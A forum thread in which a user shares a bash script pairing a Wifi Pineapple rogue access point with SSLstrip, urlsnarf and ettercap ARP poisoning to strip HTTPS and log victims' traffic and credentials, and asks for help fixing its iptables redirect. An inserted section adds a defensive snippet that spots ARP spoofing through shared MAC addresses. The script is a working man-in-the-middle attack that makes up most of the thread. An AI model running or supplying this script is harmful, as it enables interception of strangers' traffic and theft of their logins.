Wifi Pineapple And Sslstrip


dwek

Hi,

I'm working on a script to leverage the standard WP4.sh script for the Pineapple IV, combined with a MITM SSLstrip script.

The below is sort of working, but I have issues with the first iptables statement forwarding properly and how URLsnarf & SSLstrip are being passed traffic.

I'm also thinking that excluding ARP poisoning the Pineapple might be a good idea.

Any thoughts?

It's probably something obvious or just my lack of looking.

Either way, I thought I would share what I have got so far.

Thanks

#!/bin/bash

#This script combines the Wireless Pineapple (wp4.sh) and the MITM script v1.0 beta found at
#http://360percents.com/posts/automatic-mitm-shell-script/

#define variables
echo -n "Input Pineapple Netmask [or ENTER for 255.255.255.0]: "
read pineapplenetmask
if [[ $pineapplenetmask == '' ]]; then
    pineapplenetmask=255.255.255.0 #Default netmask for /24 network
fi

echo -n "Input Pineapple Network [or ENTER for 172.16.42.0/24]: "
read pineapplenet
if [[ $pineapplenet == '' ]]; then
    pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24
    pineapplerange=172.16.42.2-254 # Pineapple network. Default is 172.16.42.2-254 excluding the Pineapple IP
fi
if [[ $pineapplenet != '172.16.42.0/24' ]]; then
    pineapplerange=$pineapplenet # If default 172.16.42.0/24 is not selected, provide reduced target scope to ettercap
fi

echo -n "Input Interface between PC and Pineapple [or ENTER for eth0]: "
read pineapplelan
if [[ $pineapplelan == '' ]]; then
    pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple
fi

echo -n "Input Interface between PC and Internet [or ENTER for wlan0]: "
read pineapplewan
if [[ $pineapplewan == '' ]]; then
    pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan
fi

temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default
echo -n "Input Internet Gateway [or ENTER for $temppineapplegw]: "
read pineapplegw
if [[ $pineapplegw == '' ]]; then
    pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default
fi

echo -n "Input IP Address of Host PC [or ENTER for 172.16.42.42]: "
read pineapplehostip
if [[ $pineapplehostip == '' ]]; then
    pineapplehostip=172.16.42.42 #IP Address of host computer
fi

echo -n "Input IP Address of Pineapple [or ENTER for 172.16.42.1]: "
read pineappleip
if [[ $pineappleip == '' ]]; then
    pineappleip=172.16.42.1 #Thanks Douglas Adams
fi

#Display settings
echo Pineapple connected to: $pineapplelan
echo Internet connection from: $pineapplewan
echo Internet connection gateway: $pineapplegw
echo Host Computer IP: $pineapplehostip
echo Pineapple IP: $pineappleip
echo Network: $pineapplenet
echo Netmask: $pineapplenetmask

#Bring up Ethernet Interface directly connected to Pineapple
ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up

# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward

#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared

#setup IP forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -j ACCEPT
iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled

#remove default route
route del default
echo Default route removed

#add default gateway
route add default gw $pineapplegw $pineapplewan
echo Pineapple Default Gateway Configured

#create directory to store session results
echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "
read -e SESSION
mkdir /root/$SESSION/

# Sslstrip
echo "[+] Starting sslstrip"
xterm -geometry 75x15+1+200 -T sslstrip -e /pentest/web/sslstrip/sslstrip.py -f -s -k -w /root/$SESSION/$SESSION.log &
sleep 2

# urlsnarf
echo "[+] Starting urlsnarf"
urlsnarf -i $pineapplelan | grep http > /root/$SESSION/$SESSION.txt &
sleep 1

# Ettercap
echo ""
echo "[+] Starting ettercap"
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $pineapplelan -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$pineappleip"/ /"$pineapplerange"/ &
cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -L
sleep 1

#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 $pineappleip
if [ $? -eq 0 ]; then
    echo ""
    echo "ICS configuration successful."
    #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
    #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
    #echo "Enter Pineapple password if prompted"
    #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi

echo ""
echo "Browse to http://$pineappleip/pineapple -- Happy Hacking!"
echo ""
echo ""
echo "[+] IMPORTANT"
echo -n "After you have finished please close this script and clean up properly by hitting y "
echo ""
echo ""
read WISH
echo ""

# Clean up sslstrip, ettercap and urlsnarf
if [ $WISH = "y" ]; then
    echo ""
    echo "[+] Cleaning up and resetting iptables..."
    killall sslstrip
    killall ettercap
    killall urlsnarf
    killall xterm
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/$SESSION/$SESSION.eci
    echo "[+] Clean up successful...Bye!"
    exit
fi

exit

Link to comment
Share on other sites
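
Seen from a client on the 172.16.42.0/24 network, the `ettercap -M arp:remote` step in the script above leaves a recognisable trace: the Pineapple's IP and the host PC's IP resolve to the same MAC address. The following is an added example, not part of the original post, that looks for that pattern in a Linux `/proc/net/arp` table; the function names and the sample table are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag ARP-cache entries where one MAC answers for several IPs.
# Input format assumed: Linux /proc/net/arp
# (header line, then: IP, HW type, flags, MAC, mask, device).

# Constructed sample table: 172.16.42.1 and 172.16.42.42 share one MAC.
sample_arp_table() {
cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
172.16.42.1      0x1         0x2         00:11:22:33:44:55     *        wlan0
172.16.42.42     0x1         0x2         00:11:22:33:44:55     *        wlan0
172.16.42.107    0x1         0x2         66:77:88:99:aa:bb     *        wlan0
172.16.42.150    0x1         0x0         00:00:00:00:00:00     *        wlan0
EOF
}

# Reads an ARP table on stdin and prints "MAC ip1,ip2,..." for every MAC
# bound to more than one IP. Incomplete entries (flags 0x0) are skipped.
find_shared_macs() {
    awk 'NR > 1 && $3 != "0x0" && $4 != "00:00:00:00:00:00" {
             mac = tolower($4)
             count[mac]++
             ips[mac] = ips[mac] (count[mac] > 1 ? "," : "") $1
         }
         END {
             for (mac in count)
                 if (count[mac] > 1) print mac, ips[mac]
         }' | sort
}

# Reads an ARP table on stdin; exit status 0 if the gateway IP given as $1
# shares its MAC with at least one other host, 1 otherwise.
gateway_is_shadowed() {
    find_shared_macs | awk -v gw="$1" '
        { n = split($2, list, ",")
          for (i = 1; i <= n; i++) if (list[i] == gw) found = 1 }
        END { exit (found ? 0 : 1) }'
}

# Run against the constructed sample; on a live host use: find_shared_macs < /proc/net/arp
sample_arp_table | find_shared_macs
```

A shared MAC is not proof on its own, since a host with several addresses on one interface produces the same output, so treat a hit on the gateway IP as a reason to compare against the gateway's known hardware address.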

I'm now thinking that it may just be easier to write something that uses urlsnarf, sslstrip and ettercap on the Pineapple.

As the Pineapple is a fake AP, I won't need to use any ARP poisoning.

Anyone know of anything around?

I'm assuming this will also need some port forwarding on for sslstrip to work properly.

Link to comment
Share on other sites

  • 3 weeks later...

Hop on the Jasager forums for more responses! That's where the pineapple community lives and thrives. We're waist-deep in discussions about ettercap, and there's plenty of threads about sslstrip (I made a nice how-to without ARP) so I think this topic would be especially welcome. Thanks!

telot

Link to comment
Share on other sites
